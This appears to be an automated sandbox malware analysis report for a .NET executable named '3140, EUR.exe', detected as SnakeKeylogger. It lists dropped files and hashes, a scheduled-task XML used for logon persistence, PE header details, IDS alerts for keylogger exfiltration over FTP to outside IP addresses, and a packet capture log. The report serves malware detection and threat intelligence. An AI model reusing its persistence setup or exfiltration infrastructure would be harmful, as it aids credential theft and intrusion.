                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                          Malicious:false
                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:ASCII text, with no line terminators
                                                          Category:dropped
                                                          Size (bytes):60
                                                          Entropy (8bit):4.038920595031593
                                                          Encrypted:false
                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                          Malicious:false
                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:ASCII text, with no line terminators
                                                          Category:dropped
                                                          Size (bytes):60
                                                          Entropy (8bit):4.038920595031593
                                                          Encrypted:false
                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                          Malicious:false
                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:ASCII text, with no line terminators
                                                          Category:dropped
                                                          Size (bytes):60
                                                          Entropy (8bit):4.038920595031593
                                                          Encrypted:false
                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                          Malicious:false
                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:ASCII text, with no line terminators
                                                          Category:dropped
                                                          Size (bytes):60
                                                          Entropy (8bit):4.038920595031593
                                                          Encrypted:false
                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                          Malicious:false
                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                          Process:C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe
                                                          File Type:XML 1.0 document, ASCII text
                                                          Category:dropped
                                                          Size (bytes):1578
                                                          Entropy (8bit):5.108563392413422
                                                          Encrypted:false
                                                          SSDEEP:24:2di4+S2qh11hXy1mvWUnrKMhEMOFGpwOzNgU3ODOiIQRvh7hwrgXuNtaXJxvn:cge1wYrFdOFzOzN33ODOiDdKrsuTm/v
                                                          MD5:16EE647A4560DF7E07ADA024D87818D9
                                                          SHA1:B8D20DA70237AE65D631BEA7BF8D65F0C307CF70
                                                          SHA-256:4D30B755ADDADF9588CE3BE88B453E5AE924881BAA5821B21755E6CA231E36A8
                                                          SHA-512:41E06360353BFECA9B0460B0950EFF7FB12B5FADAF793FCBE25108B9DE138395A5527DB04AA0464DBDD2761CB2CE7E1BED0D780307C4AB2963485C8F3971951C
                                                          Malicious:false
                                                          Preview:<?xml version="1.0" encoding="UTF-16"?>.<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2014-10-25T14:27:44.8929027</Date>. <Author>user-PC\user</Author>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>user-PC\user</UserId>. </LogonTrigger>. <RegistrationTrigger>. <Enabled>false</Enabled>. </RegistrationTrigger>. </Triggers>. <Principals>. <Principal id="Author">. <UserId>user-PC\user</UserId>. <LogonType>InteractiveToken</LogonType>. <RunLevel>LeastPrivilege</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>. <RunOnlyIfNetworkAvail
                                                          Process:C:\Users\user\Desktop\3140, EUR.exe
                                                          File Type:XML 1.0 document, ASCII text
                                                          Category:dropped
                                                          Size (bytes):1578
                                                          Entropy (8bit):5.108563392413422
                                                          Encrypted:false
                                                          SSDEEP:24:2di4+S2qh11hXy1mvWUnrKMhEMOFGpwOzNgU3ODOiIQRvh7hwrgXuNtaXJxvn:cge1wYrFdOFzOzN33ODOiDdKrsuTm/v
                                                          MD5:16EE647A4560DF7E07ADA024D87818D9
                                                          SHA1:B8D20DA70237AE65D631BEA7BF8D65F0C307CF70
                                                          SHA-256:4D30B755ADDADF9588CE3BE88B453E5AE924881BAA5821B21755E6CA231E36A8
                                                          SHA-512:41E06360353BFECA9B0460B0950EFF7FB12B5FADAF793FCBE25108B9DE138395A5527DB04AA0464DBDD2761CB2CE7E1BED0D780307C4AB2963485C8F3971951C
                                                          Malicious:true
                                                          Preview:<?xml version="1.0" encoding="UTF-16"?>.<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2014-10-25T14:27:44.8929027</Date>. <Author>user-PC\user</Author>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>user-PC\user</UserId>. </LogonTrigger>. <RegistrationTrigger>. <Enabled>false</Enabled>. </RegistrationTrigger>. </Triggers>. <Principals>. <Principal id="Author">. <UserId>user-PC\user</UserId>. <LogonType>InteractiveToken</LogonType>. <RunLevel>LeastPrivilege</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>. <RunOnlyIfNetworkAvail
                                                          Process:C:\Users\user\Desktop\3140, EUR.exe
                                                          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):815104
                                                          Entropy (8bit):7.756202783919322
                                                          Encrypted:false
                                                          SSDEEP:12288:UUxLU3TBHWn/JDfaWEtYWWcw/1/4sln7aIK5nRYji9avo0Dx/v7UcM:UUxCHwDiWEepcw/ia7aV6jMG/HYcM
                                                          MD5:332593AE1E0BA5A06370963C37BBBCEB
                                                          SHA1:994F8E733BA1961882DCDEF0C78FC305DB4C1C91
                                                          SHA-256:9CA5A71321522F47140B36E5F1983CFF7455DD124CAA231D97DF29CD654C6893
                                                          SHA-512:111B6D04597E4F00D8D30CB3E1C8514B92FC1AD936DB7553A6F9F00146E0511BEDB4D0FCD2CB011959063FFA6EAC88A8287724ADE1E67A1AA77122390C7E48C0
                                                          Malicious:true
                                                          Antivirus:
                                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                                          • Antivirus: ReversingLabs, Detection: 47%
                                                          • Antivirus: Virustotal, Detection: 44%, Browse
                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......f..............0..8...0.......S... ...`....@.. ....................................@.................................kS..O....`...$..........................8?..T............................................ ............... ..H............text....3... ...8.................. ..`.rsrc....$...`...(...@..............@..@.reloc...............h..............@..B........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                          Process:C:\Users\user\Desktop\3140, EUR.exe
                                                          File Type:ASCII text, with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):26
                                                          Entropy (8bit):3.95006375643621
                                                          Encrypted:false
                                                          SSDEEP:3:ggPYV:rPYV
                                                          MD5:187F488E27DB4AF347237FE461A079AD
                                                          SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                          SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                          SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                          Malicious:true
                                                          Preview:[ZoneTransfer]....ZoneId=0
                                                          File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                          Entropy (8bit):7.756202783919322
                                                          TrID:
                                                          • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                                                          • Win32 Executable (generic) a (10002005/4) 49.78%
                                                          • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                          • Win16/32 Executable Delphi generic (2074/23) 0.01%
                                                          • Generic Win/DOS Executable (2004/3) 0.01%
                                                          File name:3140, EUR.exe
                                                          File size:815'104 bytes
                                                          MD5:332593ae1e0ba5a06370963c37bbbceb
                                                          SHA1:994f8e733ba1961882dcdef0c78fc305db4c1c91
                                                          SHA256:9ca5a71321522f47140b36e5f1983cff7455dd124caa231d97df29cd654c6893
                                                          SHA512:111b6d04597e4f00d8d30cb3e1c8514b92fc1ad936db7553a6f9f00146e0511bedb4d0fcd2cb011959063ffa6eac88a8287724ade1e67a1aa77122390c7e48c0
                                                          SSDEEP:12288:UUxLU3TBHWn/JDfaWEtYWWcw/1/4sln7aIK5nRYji9avo0Dx/v7UcM:UUxCHwDiWEepcw/ia7aV6jMG/HYcM
                                                          TLSH:9505F1D03B26B71ACE791934D639DDB592B81E68B0507AF769DC3B4B769C201AE0CF01
                                                          File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......f..............0..8...0.......S... ...`....@.. ....................................@................................
                                                          Icon Hash:07232160d4603107
                                                          Entrypoint:0x4c53be
                                                          Entrypoint Section:.text
                                                          Digitally signed:false
                                                          Imagebase:0x400000
                                                          Subsystem:windows gui
                                                          Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                          DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                          Time Stamp:0x66FA1415 [Mon Sep 30 02:59:33 2024 UTC]
                                                          TLS Callbacks:
                                                          CLR (.Net) Version:
                                                          OS Version Major:4
                                                          OS Version Minor:0
                                                          File Version Major:4
                                                          File Version Minor:0
                                                          Subsystem Version Major:4
                                                          Subsystem Version Minor:0
                                                          Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
                                                          Instruction
                                                          jmp dword ptr [00402000h]
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          NameVirtual AddressVirtual Size Is in Section
                                                          IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_IMPORT0xc536b0x4f.text
                                                          IMAGE_DIRECTORY_ENTRY_RESOURCE0xc60000x2484.rsrc
                                                          IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_BASERELOC0xca0000xc.reloc
                                                          IMAGE_DIRECTORY_ENTRY_DEBUG0xc3f380x54.text
                                                          IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                                          IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                                          IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                          NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                          .text0x20000xc33c40xc38009455e9fd9bc05992df21fc7f05987c07False0.88461202245844data7.773152694651227IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                          .rsrc0xc60000x24840x28008ad660509442e96069c4de90c708dc65False0.84150390625data7.2452124368752955IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                          .reloc0xca0000xc0x80031d96f8b9a2e917fb2f7ff5b3074f010False0.015625data0.02939680787012526IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                          NameRVASizeTypeLanguageCountryZLIB Complexity
                                                          RT_ICON0xc60c80x2028PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced0.9876093294460642
                                                          RT_GROUP_ICON0xc81000x14data1.05
                                                          RT_VERSION0xc81240x35cdata0.413953488372093
                                                          DLLImport
                                                          mscoree.dll_CorExeMain
                                                          TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                          2024-09-30T15:03:01.894291+02002845532ETPRO MALWARE SnakeKeylogger Exfil via FTP M11192.168.2.44978045.143.99.5221TCP
                                                          2024-09-30T15:03:06.041175+02002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.449734132.226.8.16980TCP
                                                          2024-09-30T15:03:08.055931+02002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.449734132.226.8.16980TCP
                                                          2024-09-30T15:03:08.573740+02002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.449737188.114.97.3443TCP
                                                          2024-09-30T15:03:10.479342+02002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.449738132.226.8.16980TCP
                                                          2024-09-30T15:03:11.053405+02002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.449739188.114.97.3443TCP
                                                          2024-09-30T15:03:12.914997+02002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.449742188.114.97.3443TCP
                                                          2024-09-30T15:03:13.352929+02002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.449741132.226.8.16980TCP
                                                          2024-09-30T15:03:14.482581+02002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.449745188.114.97.3443TCP
                                                          2024-09-30T15:03:16.259049+02002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.449741132.226.8.16980TCP
                                                          2024-09-30T15:03:17.150964+02002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.449752188.114.97.3443TCP
                                                          2024-09-30T15:03:17.408082+02002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.449753188.114.97.3443TCP
                                                          2024-09-30T15:03:20.196573+02002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.449755132.226.8.16980TCP
                                                          2024-09-30T15:03:24.274728+02002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.449759132.226.8.16980TCP
                                                          2024-09-30T15:03:25.987378+02002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.449763188.114.97.3443TCP
                                                          2024-09-30T15:03:28.112386+02002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.449765188.114.97.3443TCP
                                                          2024-09-30T15:03:28.824855+02002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.449766188.114.97.3443TCP
                                                          2024-09-30T15:03:38.813708+02002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.449774188.114.97.3443TCP
                                                          2024-09-30T15:03:40.638151+02002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.449776188.114.97.3443TCP
                                                          TimestampSource PortDest PortSource IPDest IP
                                                          Sep 30, 2024 15:03:03.605104923 CEST4973480192.168.2.4132.226.8.169
                                                          Sep 30, 2024 15:03:03.610596895 CEST8049734132.226.8.169192.168.2.4
                                                          Sep 30, 2024 15:03:03.610676050 CEST4973480192.168.2.4132.226.8.169
                                                          Sep 30, 2024 15:03:03.610894918 CEST4973480192.168.2.4132.226.8.169
                                                          Sep 30, 2024 15:03:03.615886927 CEST8049734132.226.8.169192.168.2.4
                                                          Sep 30, 2024 15:03:05.617753029 CEST8049734132.226.8.169192.168.2.4
                                                          Sep 30, 2024 15:03:05.623363972 CEST4973480192.168.2.4132.226.8.169
                                                          Sep 30, 2024 15:03:05.628303051 CEST8049734132.226.8.169192.168.2.4
                                                          Sep 30, 2024 15:03:05.914757013 CEST8049734132.226.8.169192.168.2.4
                                                          Sep 30, 2024 15:03:05.997776985 CEST49736443192.168.2.4188.114.97.3
                                                          Sep 30, 2024 15:03:05.997869968 CEST44349736188.114.97.3192.168.2.4
                                                          Sep 30, 2024 15:03:05.997972012 CEST49736443192.168.2.4188.114.97.3
                                                          Sep 30, 2024 15:03:06.006000042 CEST49736443192.168.2.4188.114.97.3
                                                          Sep 30, 2024 15:03:06.006035089 CEST44349736188.114.97.3192.168.2.4
                                                          Sep 30, 2024 15:03:06.041174889 CEST4973480192.168.2.4132.226.8.169
                                                          Sep 30, 2024 15:03:06.476068974 CEST44349736188.114.97.3192.168.2.4
                                                          Sep 30, 2024 15:03:06.476145029 CEST49736443192.168.2.4188.114.97.3
                                                          Sep 30, 2024 15:03:06.481218100 CEST49736443192.168.2.4188.114.97.3
                                                          Sep 30, 2024 15:03:06.481242895 CEST44349736188.114.97.3192.168.2.4
                                                          Sep 30, 2024 15:03:06.481561899 CEST44349736188.114.97.3192.168.2.4
                                                          Sep 30, 2024 15:03:06.524674892 CEST49736443192.168.2.4188.114.97.3
                                                          Sep 30, 2024 15:03:06.531718969 CEST49736443192.168.2.4188.114.97.3
                                                          Sep 30, 2024 15:03:06.575443983 CEST44349736188.114.97.3192.168.2.4
                                                          Sep 30, 2024 15:03:06.640223026 CEST44349736188.114.97.3192.168.2.4
                                                          Sep 30, 2024 15:03:06.640290976 CEST44349736188.114.97.3192.168.2.4
                                                          Sep 30, 2024 15:03:06.640472889 CEST49736443192.168.2.4188.114.97.3
                                                          Sep 30, 2024 15:03:06.645972013 CEST49736443192.168.2.4188.114.97.3
                                                          Sep 30, 2024 15:03:06.649216890 CEST4973480192.168.2.4132.226.8.169
                                                          Sep 30, 2024 15:03:06.654124975 CEST8049734132.226.8.169192.168.2.4
                                                          Sep 30, 2024 15:03:07.936012030 CEST8049734132.226.8.169192.168.2.4
                                                          Sep 30, 2024 15:03:07.939158916 CEST49737443192.168.2.4188.114.97.3
                                                          Sep 30, 2024 15:03:07.939201117 CEST44349737188.114.97.3192.168.2.4
                                                          Sep 30, 2024 15:03:07.939364910 CEST49737443192.168.2.4188.114.97.3
                                                          Sep 30, 2024 15:03:07.939913034 CEST49737443192.168.2.4188.114.97.3
                                                          Sep 30, 2024 15:03:07.939935923 CEST44349737188.114.97.3192.168.2.4
                                                          Sep 30, 2024 15:03:08.055931091 CEST4973480192.168.2.4132.226.8.169
                                                          Sep 30, 2024 15:03:08.412504911 CEST44349737188.114.97.3192.168.2.4
                                                          Sep 30, 2024 15:03:08.417306900 CEST49737443192.168.2.4188.114.97.3
                                                          Sep 30, 2024 15:03:08.417329073 CEST44349737188.114.97.3192.168.2.4
                                                          Sep 30, 2024 15:03:08.573729992 CEST44349737188.114.97.3192.168.2.4
                                                          Sep 30, 2024 15:03:08.573798895 CEST44349737188.114.97.3192.168.2.4
                                                          Sep 30, 2024 15:03:08.574034929 CEST49737443192.168.2.4188.114.97.3
                                                          Sep 30, 2024 15:03:08.577151060 CEST49737443192.168.2.4188.114.97.3
                                                          Sep 30, 2024 15:03:08.579109907 CEST4973480192.168.2.4132.226.8.169
                                                          Sep 30, 2024 15:03:08.581409931 CEST4973880192.168.2.4132.226.8.169
                                                          Sep 30, 2024 15:03:08.584353924 CEST8049734132.226.8.169192.168.2.4
                                                          Sep 30, 2024 15:03:08.584563971 CEST4973480192.168.2.4132.226.8.169
                                                          Sep 30, 2024 15:03:08.586250067 CEST8049738132.226.8.169192.168.2.4
                                                          Sep 30, 2024 15:03:08.586512089 CEST4973880192.168.2.4132.226.8.169
                                                          Sep 30, 2024 15:03:08.586637020 CEST4973880192.168.2.4132.226.8.169
                                                          Sep 30, 2024 15:03:08.591392994 CEST8049738132.226.8.169192.168.2.4
                                                          Sep 30, 2024 15:03:10.431041956 CEST8049738132.226.8.169192.168.2.4
                                                          Sep 30, 2024 15:03:10.438731909 CEST49739443192.168.2.4188.114.97.3
                                                          Sep 30, 2024 15:03:10.438834906 CEST44349739188.114.97.3192.168.2.4
                                                          Sep 30, 2024 15:03:10.438942909 CEST49739443192.168.2.4188.114.97.3
                                                          Sep 30, 2024 15:03:10.442131996 CEST49739443192.168.2.4188.114.97.3
                                                          Sep 30, 2024 15:03:10.442167997 CEST44349739188.114.97.3192.168.2.4
                                                          Sep 30, 2024 15:03:10.479341984 CEST4973880192.168.2.4132.226.8.169
                                                          Sep 30, 2024 15:03:10.900489092 CEST44349739188.114.97.3192.168.2.4
                                                          Sep 30, 2024 15:03:10.902487040 CEST49739443192.168.2.4188.114.97.3
                                                          Sep 30, 2024 15:03:10.902540922 CEST44349739188.114.97.3192.168.2.4
                                                          Sep 30, 2024 15:03:11.053406954 CEST44349739188.114.97.3192.168.2.4
                                                          Sep 30, 2024 15:03:11.053497076 CEST44349739188.114.97.3192.168.2.4
                                                          Sep 30, 2024 15:03:11.053548098 CEST49739443192.168.2.4188.114.97.3
                                                          Sep 30, 2024 15:03:11.053864956 CEST49739443192.168.2.4188.114.97.3
                                                          Sep 30, 2024 15:03:11.057167053 CEST4974080192.168.2.4132.226.8.169
                                                          Sep 30, 2024 15:03:11.059449911 CEST4974180192.168.2.4132.226.8.169
                                                          Sep 30, 2024 15:03:11.061975956 CEST8049740132.226.8.169192.168.2.4
                                                          Sep 30, 2024 15:03:11.062149048 CEST4974080192.168.2.4132.226.8.169
                                                          Sep 30, 2024 15:03:11.062177896 CEST4974080192.168.2.4132.226.8.169
                                                          Sep 30, 2024 15:03:11.064327955 CEST8049741132.226.8.169192.168.2.4
                                                          Sep 30, 2024 15:03:11.064393044 CEST4974180192.168.2.4132.226.8.169
                                                          Sep 30, 2024 15:03:11.064553976 CEST4974180192.168.2.4132.226.8.169
                                                          Sep 30, 2024 15:03:11.067001104 CEST8049740132.226.8.169192.168.2.4
                                                          Sep 30, 2024 15:03:11.069344997 CEST8049741132.226.8.169192.168.2.4
                                                          Sep 30, 2024 15:03:12.001118898 CEST8049741132.226.8.169192.168.2.4
                                                          Sep 30, 2024 15:03:12.005088091 CEST4974180192.168.2.4132.226.8.169
                                                          Sep 30, 2024 15:03:12.010067940 CEST8049741132.226.8.169192.168.2.4
                                                          Sep 30, 2024 15:03:12.264158010 CEST8049740132.226.8.169192.168.2.4
                                                          Sep 30, 2024 15:03:12.272716999 CEST49742443192.168.2.4188.114.97.3
                                                          Sep 30, 2024 15:03:12.272778034 CEST44349742188.114.97.3192.168.2.4
                                                          Sep 30, 2024 15:03:12.272866964 CEST49742443192.168.2.4188.114.97.3
                                                          Sep 30, 2024 15:03:12.273143053 CEST49742443192.168.2.4188.114.97.3
                                                          Sep 30, 2024 15:03:12.273159981 CEST44349742188.114.97.3192.168.2.4
                                                          Sep 30, 2024 15:03:12.305951118 CEST4974080192.168.2.4132.226.8.169
                                                          Sep 30, 2024 15:03:12.757785082 CEST44349742188.114.97.3192.168.2.4
                                                          Sep 30, 2024 15:03:12.759995937 CEST49742443192.168.2.4188.114.97.3
                                                          Sep 30, 2024 15:03:12.760020971 CEST44349742188.114.97.3192.168.2.4
                                                          Sep 30, 2024 15:03:12.914974928 CEST44349742188.114.97.3192.168.2.4
                                                          Sep 30, 2024 15:03:12.915054083 CEST44349742188.114.97.3192.168.2.4
                                                          Sep 30, 2024 15:03:12.915168047 CEST49742443192.168.2.4188.114.97.3
                                                          Sep 30, 2024 15:03:12.917529106 CEST49742443192.168.2.4188.114.97.3
                                                          Sep 30, 2024 15:03:12.924117088 CEST4974080192.168.2.4132.226.8.169
                                                          Sep 30, 2024 15:03:12.926160097 CEST4974380192.168.2.4132.226.8.169
                                                          Sep 30, 2024 15:03:12.929466009 CEST8049740132.226.8.169192.168.2.4
                                                          Sep 30, 2024 15:03:12.929591894 CEST4974080192.168.2.4132.226.8.169
                                                          Sep 30, 2024 15:03:12.930968046 CEST8049743132.226.8.169192.168.2.4
                                                          Sep 30, 2024 15:03:12.931039095 CEST4974380192.168.2.4132.226.8.169
                                                          Sep 30, 2024 15:03:12.931226969 CEST4974380192.168.2.4132.226.8.169
                                                          Sep 30, 2024 15:03:12.935966969 CEST8049743132.226.8.169192.168.2.4
                                                          Sep 30, 2024 15:03:13.303366899 CEST8049741132.226.8.169192.168.2.4
                                                          Sep 30, 2024 15:03:13.352929115 CEST4974180192.168.2.4132.226.8.169
                                                          Sep 30, 2024 15:03:13.785640001 CEST49744443192.168.2.4188.114.97.3
                                                          Sep 30, 2024 15:03:13.785681009 CEST44349744188.114.97.3192.168.2.4
                                                          Sep 30, 2024 15:03:13.785761118 CEST49744443192.168.2.4188.114.97.3
                                                          Sep 30, 2024 15:03:13.796022892 CEST49744443192.168.2.4188.114.97.3
                                                          Sep 30, 2024 15:03:13.796041012 CEST44349744188.114.97.3192.168.2.4
                                                          Sep 30, 2024 15:03:13.845216990 CEST8049743132.226.8.169192.168.2.4
